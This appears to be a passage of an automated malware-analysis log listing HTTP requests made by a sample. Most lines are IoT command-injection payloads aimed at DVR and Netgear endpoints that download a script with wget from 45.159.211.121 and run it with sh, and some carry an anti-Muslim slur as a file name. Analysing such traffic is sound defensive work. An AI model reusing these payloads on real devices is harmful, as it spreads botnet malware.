Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.56Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.64Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.61Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.64Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.61Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.64Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.61Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.64Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.61Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.64Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.61Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.64Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.61Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.94Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.94Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.94Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.94Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.94Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.94Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.93Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.95Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.93Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.95Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.93Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.95Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.93Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.95Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.93Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.95Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.93Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.95Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.97Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.97Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.97Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.97Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.97Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.97Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 141.8.192.170Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 212.5.69.131Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 212.5.69.131Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 212.5.69.131Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 212.5.69.131Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 212.5.69.131Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 212.5.69.131Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 212.5.69.131Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.124Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.124Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.124Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.124Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.124Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.124Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.221Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.221Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.221Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.221Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.221Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.221Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.221Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.158Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.160Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.158Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.160Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.158Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.160Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.158Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.160Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.158Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.160Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.158Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.160Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.173Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.173Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.173Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.173Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.173Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.173Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 195.24.68.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 195.24.68.13Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.189Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.192Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.189Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.192Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.189Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.192Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.189Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.192Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.189Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.192Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.189Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.192Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 195.24.68.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 195.24.68.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 195.24.68.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 195.24.68.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
